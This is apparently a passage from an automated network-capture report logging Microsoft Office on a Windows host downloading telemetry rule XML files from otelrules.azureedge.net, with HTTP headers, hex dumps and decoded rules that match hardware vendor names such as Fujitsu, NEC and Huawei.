                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            23192.168.2.44976013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:08 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:09 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1b8ab84b-001e-0082-570c-3b5880000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111009Z-r1d97b99577656nchC1TEBk98c0000000ab0000000005cq2
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            24192.168.2.44975913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:08 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:09 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 367ebca4-601e-0070-6762-3ba0c9000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111009Z-178bfbc474brk967hC1NYCfu600000000180000000002xzp
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            25192.168.2.44976113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:09 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: b1468599-c01e-000b-43f3-3ae255000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111009Z-r1d97b99577n4dznhC1TEBc1qw0000000a6g00000000d5dm
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            26192.168.2.44976213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:09 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111009Z-1777c6cb754vxwc9hC1TEBykgw0000000b2g000000002a8p
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            27192.168.2.44976313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:09 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111009Z-178bfbc474bfw4gbhC1NYCunf400000001c0000000008ypu
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:09 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            28192.168.2.44976513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111011Z-1777c6cb754lvj6mhC1TEBke940000000b1g00000000a7fq
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            29192.168.2.44976613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111011Z-178bfbc474bmqmgjhC1NYCy16c00000001g0000000004qx9
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            30192.168.2.44976713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 29297304-901e-0083-6776-3bbb55000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111011Z-1777c6cb7544n7p6hC1TEByvb40000000b2g00000000caf9
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            31192.168.2.44976913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 361c5568-301e-005d-3fb2-3be448000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111011Z-r1d97b995777mdbwhC1TEBezag0000000aa0000000003q4s
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
